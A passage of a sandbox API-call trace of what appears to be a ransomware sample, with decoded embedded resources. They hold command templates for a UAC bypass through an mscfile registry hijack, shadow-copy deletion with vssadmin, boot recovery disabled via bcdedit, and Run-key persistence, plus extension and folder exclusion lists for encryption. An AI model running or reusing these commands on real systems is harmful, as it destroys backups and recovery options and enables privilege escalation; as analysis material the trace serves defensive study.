csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0096.931] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0096.933] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0096.933] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0096.933] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0096.933] LockResource 
(hResData=0x50d72c) returned 0x50d72c [0096.933] FreeResource (hResData=0x50d72c) returned 0 [0096.933] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.933] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.933] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.933] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.933] FreeResource (hResData=0x50d64c) returned 0 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: 
lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThread () returned 0xfffffffe [0096.934] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0096.934] GetLastError () returned 0x3f0 [0096.934] GetCurrentProcess () 
returned 0xffffffff [0096.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0096.934] CloseHandle (hObject=0xb8) returned 1 [0096.934] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0096.934] GetCurrentProcess () returned 0xffffffff [0096.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0096.934] GetLastError () returned 0x7a [0096.934] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x1576e8 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x1576e8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x1576e8, ReturnLength=0x12fc64) returned 1 [0096.934] GetSidSubAuthorityCount (pSid=0x1576f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x1576f1 [0096.934] GetSidSubAuthority (pSid=0x1576f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x1576f8 [0096.934] LocalFree (hMem=0x1576e8) returned 0x0 [0096.934] CloseHandle (hObject=0xb8) returned 1 [0096.934] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0096.934] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0096.934] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="P:\\") 
returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.937] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0096.937] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0096.937] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0096.937] LockResource (hResData=0x516824) returned 0x516824 [0096.937] FreeResource (hResData=0x516824) returned 0 [0096.937] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.937] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.937] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.937] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.937] FreeResource (hResData=0x50d64c) returned 0 [0096.937] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", 
cchCount2=10) returned 2 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", 
cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) 
